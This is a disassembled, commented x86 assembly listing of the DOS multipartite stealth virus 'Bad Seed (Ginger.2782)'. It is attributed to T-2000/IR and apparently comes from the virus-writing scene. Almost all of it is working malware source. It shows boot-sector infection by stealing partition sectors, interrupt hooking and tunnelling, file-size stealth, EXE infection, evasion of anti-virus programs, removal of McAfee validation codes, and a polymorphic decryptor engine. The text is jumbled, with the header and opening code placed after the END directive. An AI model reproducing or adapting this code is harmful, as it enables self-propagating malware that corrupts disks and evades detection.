ID_Word DW 0FE02h ; Already-infected-tag.
Home_ST DW 0 ; Sector/track of virusbody.Home_HD DW 0 ; Head/drive of virusbody.
Relocated_Boot : PUSH CSPOP DS
XOR AX, AX ; Zero ES.MOV ES, AX
MOV BX, 7C00h
PUSH ES ; ES:BX = 0000:7C00, bootPUSH BX ; address.
MOV AX, 0201h ; Read the original MBS fromMOV CX, Home_ST ; disk.MOV DX, Home_HDINT 13h
PUSH CSPOP ES
; Create a copy of the INT 13h ISR, and the; body encryptor & appender, as the virus will; encrypt the runtime code when it infects a file; so it doesn't have to use a seperate buffer.
CLDMOV SI , OFFSET New_Int13hMOV DI , OFFSET New_Int13h_CopyMOV CX, ( New_Int1Ch - New_Int13h )REP MOVSB
MOV SI , OFFSET Append_Body_EncryptedMOV DI , OFFSET Append_Body_Encrypted_CopyMOV CX, ( Decryptor - Append_Body_Encrypted )REP MOVSB
CLI
XOR AX, AX ; ES = IVT.MOV ES, AX
LES BX, ES:[( 1Ch* 4)] ; Get INT 1Ch (timer).
MOV Old_Int1Ch , BX ; Save INT 1Ch.MOV Old_Int1Ch +2, ES
MOV ES, AX ; ES = IVT.
LES BX, ES:[( 21h* 4)] ; Get INT 21h.
MOV Old_Int21h , BX ; Save INT 21h aswell.MOV Old_Int21h +2, ES
MOV ES, AX ; ES = IVT.
; Hook INT 1Ch.
MOV ES:[( 1Ch* 4)], OFFSET New_Int1ChMOV ES:[( 1Ch* 4)+ 2], DS
STI
RETF ; Jump to the original MBS.
; This is where the polymorphic decryptor jumps; to after it's done decrypting the virusbody.
Init_Virus :CALL Get_IP ; Calculate the virus'
Get_IP : POP SI ; delta offset in this CS.SUB SI , OFFSET Get_IP
PUSH SI ; Save some needed registers.PUSH AXPUSH ES
PUSH CSPOP DS
MOV AX, ES ; AX = current PSP.
; Add the effective segment (PSP) to the segment va lues.
ADD [ SI +( Host_CS - START)], AXADD [ SI +( Host_SS - START)], AX
DEC AX ; Get the host's MCB in ES.MOV ES, AX
MOV AX, 0FE02h ; Virus' residency check.INT 21h
CMP AX, NOT 0FE02h ; Virus is already installed?JE Run_Host ; Then just bail to the host.
CMP BYTE PTR ES:[ 0], 'Z' ; Make sure this block is theJNE Run_Host ; last one in the chain, else
; higher blocks might get; damaged.
; Make sure the memory block holds enough; space to put the viruscode in.
CMP WORDPTR ES:[ 3], Virus_Size_MemJBE Run_Host
MOV AX, ES:[ 12h ] ; PSP:[2], holds TOM segment.SUB AX, Virus_Size_Mem ; Minus the virus' size to
; get the virus segment.
MOV ES, AX ; Virus segment.
XOR DI , DI ; Relocate the viruscode toMOV CX, Virus_Size ; the newly calculatedCLD ; unused segment.REP MOVSB
PUSH ES ; DS = virus segment.POP DS
CALL Infect_MBS ; Infect the 1st MBS.
Run_Host : POP ES ; Restore ES (PSP).POP AX ; Restore AX (FCB status).
PUSH ES ; DS=ES=PSP.POP DS
POP SI ; Restore virus delta offset.
; Restore the host's original SS.
MOV SS, CS:[ SI +( Host_SS - START)]
; And jump to the host's original entrypoint.
JMP DWORDPTR CS:[ SI +( Host_IP - START)]
Infect_MBS :MOV AH, 2Ah ; Get the current date.INT 21h
MOV Infect_Year , CX ; Store date of infection.MOV Infect_MD , DX
MOV AH, 52h ; Get M$-DOS list of lists.INT 21h ; (undocumented).
MOV AX, ES:[ BX- 2] ; Get segment of 1st MCB.MOV First_MCB , AX ; And save it for tunneler.
MOV AX, 3513h ; Get INT 13h.INT 21h
MOV Old_Int13h , BX ; Save INT 13h.MOV Old_Int13h +2, ES
MOV AX, 3501h ; Get INT 01h.INT 21h
MOV SI , BX ; Save INT 01h in DI:SI.MOV DI , ES
MOV AX, 2501h ; Put in the tunneler.MOV DX, OFFSET New_Int01hINT 21h
MOV Tunnel_Success , 0 ; Initialize as 'not found'.
PUSHF ; Set the trapflag (TF).POP AX
OR AX, 100hPUSH AX
POPF
MOV AX, 0201h ; Read the MBS of HD 1.MOV BX, OFFSET BufferMOV CX, 1MOV DX, 80h
PUSH DSPOP ES
PUSHF ; Call INT 13h while tracing.CALL DWORDPTR Old_Int13h
PUSHF ; Disable the TF incasePOP AX ; INT 13h wasn't found.AND AX, NOT 100h
PUSH AXPOPF
PUSHF
MOV AX, 2501h ; Restore original INT 01h.MOV DX, SIMOV DS, DIINT 21h
POPF ; Flags after the MBS read.JNC Check_MBS ; If error, then bail out.
JMP Exit_Inf_MBS
Check_MBS: PUSH ES ; ES = virus segment.POP DS
; Check if the MBS is already infected.
CMP [ BX+( ID_Word - MBS_Loader )], 0FE02hJNE Find_DOS_Part
JMP Exit_Inf_MBS
; This locates a DOS partition.
Find_DOS_Part : ADD BX, 1BEh ; BX = begin partition table.
MOV CX, 4 ; Maximum of 4 partitions.
Scan_Partition : MOV AL, [ BX+4] ; Get the partition's system; indicator.
CMP AL, 4 ; DOS 16-bit FAT ?JE Store_Home
CMP AL, 6 ; DOS > 32M ?JE Store_Home
CMP AL, 1 ; DOS 12-bit FAT ?JE Store_Home
ADD BX, 16 ; Next partition.
LOOP Scan_Partition ; Loop to the next partition.
JMP Exit_Inf_MBS ; None found.
Store_Home : MOV DL, 80h ; First harddisk.MOV DH, [ BX+5] ; Last head of DOS partition.
MOV Home_HD, DX ; Store virus' home; drive & head.
MOV AX, [ BX+6] ; Last sector & track of; DOS partition.
MOV CX, AXMOV SI , Virus_Size_512 +1 ; Virus sectors + old MBS.
AND AX, 0000000000111111b ; Strip track count to get; the last track sector.
CMP AX, SI ; There's enough space onJBE Exit_Inf_MBS ; this track for the virus?
SUB CX, SI ; Steal needed sectors from; the partition's last track.
MOV DI , BXINC CX
MOV Home_ST, CX
MOV AX, 0301h ; Store the MBS on the stolenMOV BX, OFFSET Buffer ; partition sectors.
PUSHFCALL DWORDPTR Old_Int13hJC Exit_Inf_MBS
DEC CX ; Adjust the DOS partitionMOV [ DI +6], CX ; to have 6 sectors less.
INC CX
SUB [ DI +12], SI ; Adjust the partition sectorSBB WORDPTR [ DI +12+2], 0 ; count aswell.
; Write the virusbody to the stolen sectors.
MOV AX, 0300h +Virus_Size_512MOV BX, 0
INC CX
PUSHF ; INT 13h.CALL DWORDPTR Old_Int13hJC Exit_Inf_MBS
; Copy the virus MBS loader into the MBS.
MOV SI , OFFSET MBS_LoaderMOV DI , OFFSET BufferMOV CX, ( Relocated_Boot - MBS_Loader )CLDREP MOVSB
MOV AX, 0301h ; Write the infected MBSMOV BX, OFFSET Buffer ; to disk.MOV CX, 1XOR DH, DH
PUSHF ; INT 13h.CALL DWORDPTR Old_Int13h
Exit_Inf_MBS : RETN
New_Int01h :PUSH BP ; Setup a stack pointer.MOV BP, SP
CMP CS: Tunnel_Success , 1 ; Tunnel already finished?JE Clear_TF ; *** Pointless code, since
; the TF is already cleared.
CMP [ BP+( 2* 2)], 1234h ; We're in the DOS kernel?First_MCB = WORDPTR $- 2
JA Exit_Int01h
PUSH AXPUSH ES
LES AX, [ BP+( 1* 2)] ; Get instruction's CS:IP.
MOV CS: Old_Int13h , AX ; Save it.MOV CS: Old_Int13h +2, ES
MOV CS: Tunnel_Success , 1 ; Mark tunnel successful.
POP ESPOP AX
Clear_TF : AND [ BP+( 3* 2)], NOT 100h ; Disable the trapflag.
Exit_Int01h : POP BP
IRET
New_Int13h :CMP CX, 1 ; Track 0, sector 1 ?JNE JMP_Old_Int13h
CMP DX, 80h ; Head 0, of the 1st HD ?JNE JMP_Old_Int13h
CMP AH, 03h ; Is it a sector write?JA JMP_Old_Int13h
CMP AH, 02h ; Or a sector read?JB JMP_Old_Int13h
PUSH CXPUSH DX
DEC AL ; Only the MBS gets read?JZ Read_Orig_MBS
PUSH AXPUSH BX
ADD BX, 512 ; Next sector in buffer.INC CX ; Next sector.
PUSHF ; Process the other sectorsCALL DWORDPTR CS: Old_Int13h ; first, so the MBS action
; can be redirected to the; clean one.
POP BXPOP AX
Read_Orig_MBS : MOV AL, 1 ; Just the MBS.
MOV CX, CS: Home_ST ; Load address of originalMOV DX, CS: Home_HD ; MBS.
PUSHF ; Read/write the originalCALL DWORDPTR CS: Old_Int13h ; MBS.
POP DXPOP CX
RETF 2 ; Return with flags.
JMP_Old_Int13h : JMP DWORDPTR CS: Old_Int13h
New_Int1Ch :PUSH AXPUSH BXPUSH ESPUSH DS
XOR AX, AX ; ES = IVT.MOV ES, AX
PUSH CSPOP DS
LES BX, ES:[( 21h* 4)] ; Get INT 21h.
MOV AX, ES ; AX = segment of INT 21h.
CMP AX, 800h ; Is it too high?JA Exit_Int1Ch ; Then assume DOS ain't
; loaded yet.
CMP AX, Old_Int21h +2 ; Has the DOS segment
JNE Save_Int21h ; changed since boot-up?
CMP BX, Old_Int21h ; Has the DOS offset changedJE Exit_Int1Ch ; since boot-up?
Save_Int21h : MOV Old_Int21h , BX ; Save INT 21h.MOV Old_Int21h +2, ES
XOR AX, AX ; DS = IVT.MOV DS, AX
LES BX, DWORDPTR CS: Old_Int1Ch
MOV DS:[( 1Ch* 4)], BX ; Restore original INT 1Ch.MOV DS:[( 1Ch* 4)+ 2], ES
LES BX, DS:[( 13h* 4)] ; Get INT 13h.
MOV CS: Old_Int13h , BX ; Save INT 13h.MOV CS: Old_Int13h +2, ES
; Hook INT 13h.
MOV DS:[( 13h* 4)], OFFSET New_Int13h_CopyMOV DS:[( 13h* 4)+ 2], CS
; Hook INT 21h.
MOV DS:[( 21h* 4)], OFFSET New_Int21hMOV DS:[( 21h* 4)+ 2], CS
Exit_Int1Ch : POP DSPOP ESPOP BXPOP AX
IRET
New_Int21h :CMP AH, 11h ; Findfirst (FCB) ?JB Check_Dir_St
CMP AH, 12h ; Findnext (FCB) ?JA Check_Dir_St
CALL FCB_Stealth ; Carry-out the FCB stealth.
RETF 2 ; Return with flags.
Check_Dir_St : CMP AH, 4Eh ; Findfirst (dir) ?JB Check_TSR_Test
CMP AH, 4Fh ; Findnext (dir) ?JA Check_TSR_Test
CALL Dir_Stealth ; Carry-out the dir stealth.
RETF 2 ; Return with flags.
Check_TSR_Test : CMP AX, 0FE02h ; Virus' residency check?JNE Check_Message
NOT AX ; Return TSR mark.
IRET ; Return to the caller.
Check_Message : CMP AX, 0FE03h ; Call to display message?JNE Check_Exec
CMP CS: Infect_Year , 0 ; The date was correct?JNZ JMP_Old_Int21h ; Else just ignore the call.
CALL Display_Message
IRET
Check_Exec : CMP AX, 4B00h ; Program execute?JE Init_Stack
CMP AH, 4Ch ; Program terminate?JNE JMP_Old_Int21h
Init_Stack : MOV CS: Old_SP , SP ; Save the current stack.MOV CS: Old_SS , SS
CLI ; Setup own stack.PUSH CSPOP SS
MOV SP, OFFSET Validate_Header +128STI
CMP AH, 4Ch ; Was it program terminate?JNE Do_Infect_File
CALL Check_Activate
JMP Restore_Stack
Do_Infect_File : CALL Infect_File
Restore_Stack : CLI ; Restore the original stack.MOV SS, CS: Old_SSMOV SP, CS: Old_SPSTI
JMP $+2 ; *** Pointless instruction.
JMP_Old_Int21h : INC CS: Int_Count ; Update random counter.
JMP DWORDPTR CS: Old_Int21h
New_Int24h :MOV AL, 03h ; Fail operation.IRET
FCB_Stealth :PUSH BXPUSH ES
PUSH AX
MOV AH, 2Fh ; Get current DTA.CALL Do_Old_Int21h
POP AX
PUSHF ; Execute the call.CALL DWORDPTR CS: Old_Int21h
PUSHFPUSH AX
CMP AL, - 1 ; Error?JE Exit_FCB_St ; Then get out.
CMP ES:[ BX.FCB_Drive ], - 1 ; Is it an extended FCB ?JNE Get_FCB_Time
ADD BX, 7 ; Then skip extended stuff.
Get_FCB_Time : MOV AL, BYTE PTR ES:[ BX.FCB_Time ]
AND AL, 00011111b ; Mask-out seconds value.
CMP AL, ( 62/ 2) ; File is infected?JNE Exit_FCB_St
; Restore the original filesize.
SUB ES:[ BX.FCB_Size ], Virus_SizeSBB ES:[ BX.FCB_Size +2], 0
Exit_FCB_St : POP AXPOPF
POP ESPOP BX
RETN
Dir_Stealth :PUSH BXPUSH ES
PUSH AX
MOV AH, 2Fh ; Get current DTA.CALL Do_Old_Int21h
POP AX
PUSHF ; Execute the call.CALL DWORDPTR CS: Old_Int21h
PUSHFPUSH AX
JC Exit_Dir_St ; Get out if error.
MOV AL, BYTE PTR ES:[ BX.Dir_Time ]
AND AL, 00011111b ; Mask-out seconds value.
CMP AL, ( 62/ 2) ; File is infected?JNE Exit_Dir_St
; Restore original filesize.
SUB ES:[ BX.Dir_Size ], Virus_SizeSBB ES:[ BX.Dir_Size +2], 0
Exit_Dir_St : POP AXPOPF
POP ESPOP BX
RETN
Write_File :MOV AH, 40h ; Write to file.JMP Do_Read_Write
Read_File :MOV AH, 3Fh ; Read from file.
Do_Read_Write : CALL Load_BX_Int21hJC Exit_Re_Wr ; If error then exit with CF.
SUB AX, CX ; Set's CF if not all bytes; were read.
Exit_Re_Wr : RETN
Seek_EOF:XOR CX, CX ; Seeks to end of file.XOR DX, DX
Seek_EOF_Rel : MOV AX, 4202h ; Seeks EOF relative.JMP Load_BX_Int21h
Seek_BOF:XOR CX, CX ; Seeks to begin of file.XOR DX, DXMOV AX, 4200h
Load_BX_Int21h : MOV BX, CS: File_Handle ; Load the filehandle.
Do_Old_Int21h : CLI ; Do the DOS call.PUSHFCALL DWORDPTR CS: Old_Int21h
RETN
Infect_File :PUSH AXPUSH BXPUSH CXPUSH DXPUSH SIPUSH DIPUSH ESPUSH DS
CALL Check_File_Name ; Filename can't contain 'SC'JNC Init_Infect ; or a 'V'.
JMP Exit_Infect
Init_Infect : PUSH DXPUSH DS
PUSH CSPOP DS
MOV AX, 3524h ; Get INT 24h.CALL Do_Old_Int21h
MOV Old_Int24h , BX ; Save it.MOV Old_Int24h +2, ES
MOV AX, 2524h ; Install own INT 24h.MOV DX, OFFSET New_Int24hCALL Do_Old_Int21h
POP DS ; File path.POP DX
MOV AX, 4300h ; Get file's attributes.CALL Do_Old_Int21h
MOV CS: Old_Attr , CX ; Save attributes.
JNC Blank_Attr
DB 0E9h, 7Eh, 0
; * JMP Restore_Int24h *
Blank_Attr : MOV AX, 4301h ; Blank file attributes.XOR CX, CXCALL Do_Old_Int21hJC Restore_Int24h
MOV AX, 3D02h ; Open the file read/write.CALL Do_Old_Int21hJC Restore_Attr
PUSH DXPUSH DS
PUSH CSPOP DS
MOV File_Handle , AX ; Save the filehandle.
MOV AX, 5700h ; Get file's date & time.CALL Load_BX_Int21hJC Restore_Date
MOV Old_File_Date , DX ; Save them.MOV Old_File_Time , CX
CALL Seek_BOF ; Seek to the start of the; file. *** file pointer is; already at BOF.
MOV DX, OFFSET Header ; Read the file's header.MOV CX, 28 ; *** Reading in more thanCALL Read_File ; needed.JC Restore_Date
PUSH DSPOP ES
MOV DI , OFFSET Check_ActivateMOV CX, 32
CMP Header.EXE_ID , 'ZM' ; It's an .EXE-file?JNE Restore_Date ; If not, abort infect.
MOV AX, Header.Checksum ; See if the checksum matchesCLD ; a semi-random word in theREPNE SCASW ; viruscode.JNE Check_Validate
OR Old_File_Time , ( 62/ 2) ; *** Infected files already; have 62 seconds.
JMP Restore_Date
Check_Validate : CALL Remove_Validate ; Remove McAfee validationJC Restore_Date ; shit.
CALL Add_Virus ; Add the virus to the file.
Restore_Date : MOV AX, 5701h ; Restore file's date & time.MOV DX, Old_File_DateMOV CX, Old_File_TimeCALL Load_BX_Int21h
MOV AH, 3Eh ; Close the file.CALL Load_BX_Int21h
POP DS ; File path.POP DX
Restore_Attr : MOV AX, 4301h ; Restore file's originalMOV CX, CS: Old_Attr ; attributes.CALL Do_Old_Int21h
Restore_Int24h : MOV AX, 2524h ; Restore original INT 24h.LDS DX, DWORDPTR CS: Old_Int24hCALL Do_Old_Int21h
Exit_Infect : POP DSPOP ESPOP DIPOP SIPOP DXPOP CXPOP BXPOP AX
RETN
; Returns CF when the filename holds 'SC' or a 'V', this includes most; anti-virus programs, SCAN, TBSCAN, VIRSCAN, CPAV, NAV, IBMAV, etc.Check_File_Name :
PUSH DSPOP ES
MOV DI , DX ; Find the end of the string.MOV CX, - 1
XOR AL, ALCLDREPNE SCASB
NOT CX ; CX = length of entire path.
MOV DI , DX
MOV AX, 'CS' ; 'SC'.
MOV SI , CX
Find_SCan : SCASW ; Found 'SC' ?JE Bad_File_Name ; Then bail.
DEC DI ; We're doing bytes.
LOOP Find_SCan
MOV CX, SI ; Search for a 'V'.MOV DI , DXMOV AL, 'V'REPNE SCASBJE Bad_File_Name
; *** It would have been better if only the filenam e; was searched instead of the entire path.
Good_File_Name : CLC ; Filename is OK.
RETN
Bad_File_Name : STC ; Filename ain't OK!
RETN
; Removes a possible McAfee validation code from th e file.Remove_Validate :
MOV CX, - 1 ; Seek to the last 10 bytes.MOV DX, - 10CALL Seek_EOF_Rel
MOV DX, OFFSET Validate_Header ; Read 8 from there.MOV CX, 8CALL Read_FileJC Exit_Remove_Va
CMP Validate_Header , 0FDF0h ; Check for the signature.JNE Not_Protected
CMP Validate_Header +2, 0AAC5hJNE Not_Protected
MOV CX, - 1 ; Seek to the last 9 bytes.MOV DX, - 9CALL Seek_EOF_Rel
; Trash signature.
MOV DX, OFFSET Validate_Header +6MOV CX, 4CALL Write_File
Exit_Remove_Va : RETN
Not_Protected : CLC
RETN
Add_Virus :CALL Seek_EOF
MOV SI , AX ; DI:SI = old filesize.MOV DI , DX
MOV BX, OFFSET Header
MOV AX, [ BX.File_512_Pages ] ; Calculate 512-byte pagesMUL Word_512 ; of the file.
SUB AX, SI ; Physical size exceeds imageSBB DX, DI ; size? Then it's usually anJNC Calc_Hdr_Size ; overlay, so bug out.
JMP Exit_Add_Virus
Calc_Hdr_Size : MOV AX, [ BX.Header_Size ] ; Calculate headersize.MUL Word_16
SUB SI , AX ; DI:SI = imagesize.SBB DI , DX
MOV AX, [ BX.Program_SS ] ; Save file's original SS.MOV Host_SS , AXADD Host_SS , ( 256 / 16) ; Add PSP size.
MUL Word_16 ; DX:AX = SS in bytes.
ADD AX, [ BX.Program_SP ] ; Plus SP value.; *** Missing a ADC DX, 0.
SUB AX, SI ; Stack points inside theSBB DX, DI ; program image?JC Save_CS
SUB AX, 128 ; Original program must haveSBB DX, 0 ; atleast 128 bytes of stack.JC Exit_Add_Virus ; Else get out.
; Adjust the stack so the viruscode; doesn't get overwritten.
ADD [ BX.Program_SS ], ( Virus_Size +15)/ 16
Save_CS: MOV AX, [ BX.Program_CS ] ; Old CS.ADD AX, ( 256 / 16) ; Add size of PSP.
MOV Host_CS , AX ; Save CS.
MOV AX, [ BX.Program_IP ] ; Save IP.MOV Host_IP , AX
CALL Seek_EOF
ADD AX, Virus_Size ; Calculate size afterADC DX, 0 ; infection.
DIV Word_512 ; Calculate imagesize.
INC AX ; Round upwards.
; Set new imagesize.
MOV Header.File_512_Pages , AXMOV Header.Image_Mod_512 , DX
MOV DX, DI ; DI:SI = old imagesize.MOV AX, SIDIV Word_16 ; Calculate new CS:IP.
MOV Header.Program_CS , AX ; Set new CS.
MOV BX, DX ; BX = new IP.
ADD DX, OFFSET Decryptor ; Set new IP.MOV Header.Program_IP , DX
CALL Poly_Engine ; Add a polymorphic virusJC Exit_Add_Virus ; copy to the host.
OR Old_File_Time , ( 62/ 2) ; Mark the file as infected; by setting the second value; to an invalid setting.
MOV BX, Int_Count ; Random counter.AND BX, 00011111b ; 0 - 31.SHL BX, 1 ; MUL 2 (for word index).
; Put a semi-random word from the viruscode in the; header's checksum field to mark the infection.
MOV AX, [( Check_Activate - START)+ BX]MOV Header.Checksum , AX
CALL Seek_BOF
MOV CX, 28 ; Write the updated headerMOV DX, OFFSET Header ; to the target.CALL Write_File
Exit_Add_Virus : RETN
; The decryptors being generated are quite simple, they are effectively; enough against pure signature scanners, though ca n be found with a simple; algorithmic approach. A pecularity is that the de cryptors use themselves; as a key, which drastically complicates debugging .
Poly_Engine :PUSH BP
XOR AH, AH ; Get BIOS tick count.INT 1Ah
MOV AX, DXMOV BP, DX ; BP is used as a pointer to
; random data.
PUSH DSPOP ES
MOV DI , OFFSET Decryptor ; Fill the decryptor areaMOV SI , DI ; with a random word.MOV CX, ( 64/ 2)CLDREP STOSW
XOR DX, DX ; Zero ES.MOV ES, DX
CALL Make_Load_DS ; Construct the decryptor.CALL Make_Load_PtrCALL Make_Decr_Loop
MOV BYTE PTR [ SI ], 0E9h ; JMP 16-bit displacement.
MOV DI , OFFSET Init_Virus ; Calculate displacementSUB DI , SI ; to Init_Virus.SUB DI , 3
INC SI
MOV [ SI ], DI ; Set displacement.
MOV AX, OFFSET Append_Body_Encrypted_CopyCALL AX
POP BP
RETN
Make_Load_DS:DEC BP ; Adjust random pointer.
; *** Not needed as this is; the first reference to it.
TEST BYTE PTR ES:[ BP], 00000010b ; Test a random bit.JNZ Make_Load_DS_2
Make_Load_DS_1: MOV BYTE PTR [ SI ], 0Eh ; PUSH CSINC SI
CALL Add_Junk ; Add a garbage instruction.
MOV BYTE PTR [ SI ], 1Fh ; POP DSINC SI
CALL Add_Junk
RETN
Make_Load_DS_2: MOV [ SI ], 0CB8Ch ; MOV BX, CSINC SIINC SI
CALL Add_Junk
MOV [ SI ], 0DB8Eh ; MOV DS, BXINC SIINC SI
CALL Add_Junk
RETN
Make_Load_Ptr :AND CH, 11111110b ; BX is start code.
; *** CX is already zero.DEC BP
TEST BYTE PTR ES:[ BP], 00000010bJZ Make_MOV_BX
OR CH, 00000001b ; SI is start code.
Make_MOV_SI: MOV BYTE PTR [ SI ], 0BEh ; MOV SI, xxxxINC SI
MOV [ SI ], BX ; Start virus in CS orINC SI ; start decryptor in CS.
INC SI
CALL Add_Junk
ADD BX, OFFSET Decryptor
TEST CH, 00000001b ; BX is start code?JZ Make_Counter
Make_MOV_BX: MOV BYTE PTR [ SI ], 0BBh ; MOV BX, xxxxINC SI
MOV [ SI ], BX ; Start virus in CS orINC SI ; start decryptor in CS.
INC SI
CALL Add_Junk
ADD BX, OFFSET Decryptor
TEST CH, 00000001b ; BX is start code?JZ Make_MOV_SI ; Then use SI as start
; decryptor.
Make_Counter : SUB BX, OFFSET Decryptor ; Restore BX to virus offset.
CALL Add_Junk
; CX is always the counter register.
MOV BYTE PTR [ SI ], 0B9h ; MOV CX, xxxxINC SI
MOV AX, OFFSET Decryptor
MOV [ SI ], AX ; Size of encrypted code.INC SIINC SI
CALL Add_JunkCALL Add_Junk
RETN
Make_Decr_Loop :MOV AH, 14h ; DL, [SI]MOV DH, 17h ; DL, [BX]
TEST CH, 00000001b ; BX is start of code?JZ Make_Load_Byte ; Yeah.
XCHG AH, DH ; Else SI is.
Make_Load_Byte : MOV DI , SI ; Save start decrypt in DI.
MOV AL, 8Ah ; MOV reg8
MOV [ SI ], AX ; MOV DL, [SI]/[BX]INC SIINC SI
CALL Add_Junk
XOR DL, DL ; ADD BYTE PTR
; Initialize the encryptor.
MOV BYTE PTR DS:[ Append_Body_Encrypted_Copy +( Encryptor -Append_Body_Encrypted )], 28h ; SUB BYTE PTR
DEC BP
TEST BYTE PTR ES:[ BP], 00000010bJZ Store_Decrypt
MOV DL, 30h ; XOR BYTE PTR
; Initialize the encryptor.
MOV BYTE PTR DS:[ Append_Body_Encrypted_Copy +( Encryptor -Append_Body_Encrypted )], DL
Store_Decrypt : MOV [ SI ], DX ; Store decrypt instruction.INC SIINC SI
MOV [ SI ], 4346h ; INC SI / INC BXINC SIINC SI
CALL Add_Junk
MOV AX, 0FE81h ; CMP SI, xxxxMOV CL, 0BEh ; MOV SI, xxxx
TEST CH, 00000001b ; BX is start of code?JZ Make_CMP_End ; Yip-yip.
MOV AH, 0FBh ; CMP BX, xxxxMOV CL, 0BBh ; MOV BX, xxxx
Make_CMP_End: MOV [ SI ], AX ; Make CMP end_decryptor.INC SIINC SI
PUSH BX
ADD BX, 64 ; Offset decryptor + fixed; size of decryptor.
MOV [ SI ], BX ; (end of decryptor).INC SIINC SI
POP BX ; Start of code.
MOV BYTE PTR [ SI ], 72h ; JB xxINC SI
MOV DX, SI ; DX = displacement patch; offset.
INC SI
CALL Add_Junk
MOV [ SI ], CL ; MOV BX/SI, xxxxINC SI
MOV [ SI ], BX ; Start decryptor.INC SIINC SI
MOV AX, SI ; Calculate displacementSUB AX, DX ; between DX and SI.
DEC AX
MOV BX, DX ; JB displacement offset.MOV [ BX], AL ; Patch it.
CALL Add_JunkCALL Add_Junk
MOV BYTE PTR [ SI ], 0E2h ; LOOP xxINC SI
SUB DI , SI ; Displacement between hereDEC DI ; and start decrypt loop.
MOV AX, DI
MOV [ SI ], AL ; Store displacement.INC SI
CALL Add_Junk
RETN
Add_Junk :DEC BP
TEST BYTE PTR ES:[ BP], 00001111bJZ Exit_Add_Junk
DEC BPMOV AL, ES:[ BP]
TEST AL, 00000010bJZ Junk_CMP
TEST AL, 00000100bJZ Junk_TEST
TEST AL, 00001000bJZ Junk_NOP
MOV [ SI ], 0C789h ; MOV DI, AXINC SIINC SI
JMP Exit_Add_Junk
Junk_NOP: MOV BYTE PTR [ SI ], 90h ; NOPINC SI
JMP Exit_Add_Junk
Junk_TEST : MOV AL, 85h ; TEST r16
Make_Operand : DEC BPMOV AH, ES:[ BP]
TEST AH, 00000010bJZ Set_reg_reg
DEC AL ; r16 -> r8.
Set_reg_reg : OR AH, 11000000b ; reg/reg operation.
MOV [ SI ], AX ; Store junk instruction.INC SIINC SI
JMP Exit_Add_Junk
Junk_CMP: DEC BP
TEST BYTE PTR ES:[ BP], 00000010bJZ Junk_CLD
MOV AL, 39h ; CMP r16, r16JMP Make_Operand
Junk_CLD: MOV BYTE PTR [ SI ], 0FCh ; CLDINC SI
Exit_Add_Junk : RETN
Append_Body_Encrypted :
CALL Crypt_Virus
MOV AH, 40hMOV BX, File_HandleMOV DX, 0MOV CX, Virus_Size
PUSHFCALL DWORDPTR Old_Int21h
JC Crypt_Loop
SUB AX, CX
Crypt_Loop : PUSHF
CMP byte ptr ds : Append_Body_Encrypted_Copy +( Encryptor -Append_Body_Encrypted ), 28h ; SUB
JNE Do_Crypt_Virus
MOV byte ptr ds : Append_Body_Encrypted_Copy +( Encryptor -Append_Body_Encrypted ), 0Do_Crypt_Virus : CALL Crypt_Virus
POPF
RETN
Crypt_Virus :MOV BX, 0MOV SI , OFFSET DecryptorMOV CX, OFFSET Decryptor
Crypt_Byte : MOV DL, [ SI ] ; Get key from the decryptor.
XOR [ BX], DL ; Encrypt/decrypt byte.Encryptor = BYTE PTR $- 2
INC SIINC BX
CMP SI , OFFSET Old_Int13hJB Loop_Crypt_B
MOV SI , OFFSET Decryptor
Loop_Crypt_B : LOOP Crypt_Byte
RETN
Decryptor :PUSH CS
TEST CL, BL
POP DS ; Load DS with CS.
MOV BX, 0
TEST SP, AX
MOV SI , OFFSET Decryptor ; Decryptor pointer.
CLD
TEST CH, BL
MOV CX, OFFSET Decryptor ; Count to decrypt.
TEST AX, CX
Decrypt_Byte : MOV DL, [ SI ] ; Get the key from the; decryptor.
DB 039h , 0D8h
; * CMP AX, BX *
XOR [ BX], DL ; Decrypt byte.
INC SI ; Update code & decryptorINC BX ; pointers.
NOP
CMP SI , OFFSET Old_Int13h ; Completely ran over theJB Decrypt_Loop ; decryptor?
NOP
MOV SI , OFFSET Decryptor ; Then reload the pointer.
Decrypt_Loop : NOP
LOOP Decrypt_Byte ; Decrypt all bytes.
CLD
JMP Init_Virus ; Jump to the real start.
ORG Decryptor +64 ; Pad decryptor size.
Old_Int13h DW 0, 0
End_Body :
Buffer :
File_Handle DW 0Old_SP DW 0Old_SS DW 0Old_Attr DW 0Old_File_Date DW 0Old_File_Time DW 0Old_Int1Ch DW 0, 0Old_Int21h DW 0, 0Old_Int24h DW 0, 0Int_Count DW 0
New_Int13h_Copy :
DB ( New_Int1Ch - New_Int13h ) DUP( 0)
Append_Body_Encrypted_Copy :
DB ( Decryptor - Append_Body_Encrypted ) DUP( 0)
Header DW 14 DUP( 0)
Validate_Header DW 4 DUP( 0)
ORG Buffer +512End_Heap:
Carrier :MOV AX, 4C00hINT 21h
EXE_Header STRUCEXE_ID DW 0Image_Mod_512 DW 0File_512_Pages DW 0Reloc_Items DW 0Header_Size DW 0Min_Size_Mem DW 0Max_Size_Mem DW 0Program_SS DW 0Program_SP DW 0Checksum DW 0Program_IP DW 0Program_CS DW 0Reloc_Table DW 0EXE_Header ENDS
Find_FN_FCB STRUCFCB_Drive DB 0FCB_Name DB 8 DUP( 0)FCB_Ext DB 3 DUP( 0)FCB_Attr DB 0FCB_Reserved DB 10 DUP( 0)FCB_Time DW 0FCB_Date DW 0FCB_Start_Clust DW 0FCB_Size DW 0, 0Find_FN_FCB ENDS
Find_FN_Dir STRUCDir_Reserved DB 21 DUP( 0)Dir_Attr DB 0Dir_Time DW 0Dir_Date DW 0Dir_Size DW 0, 0Dir_Name DB 13 DUP( 0)Find_FN_Dir ENDS
END Init_Virus
; Bad Seed (Ginger.2782) disasm.; Multipartite full-stealth MBS/COM/EXE.; Quite a good virus for it's time (1992), yet the coding style could be; made more compact, and it's buggy aswell.; Bugs marked with '***'.; T-2000/IR, February 2000 - September 2000.
.MODEL TINY
.CODE
Virus_Size EQU ( End_Body - START)Virus_Size_512 EQU (( End_Body - START)+ 511 )/ 512Virus_Size_1024 EQU 3COM EQU 1EXE EQU 0Boot EQU 0File EQU 1
START:CALL File_Entry
Boot_Loader : ; *** This code assumes DS = 0, which; does not necessarly have to be the case.
; Restore original word that was temporary; replaced with the 55AAh bootmarker.
MOV WORDPTR DS:[ 7C00h+510 ], 0Original_Word = WORDPTR $- 2
; Steal 3k of DOS memory to hide the virus in.
SUB WORDPTR DS:[ 413h ], Virus_Size_1024
INT 12h ; Get new DOS memory size.
MOV CL, 6 ; Calculate segment where toSHL AX, CL ; hide.
MOV ES, AX ; ES = virus segment.
; Read rest of virusbody off disk.
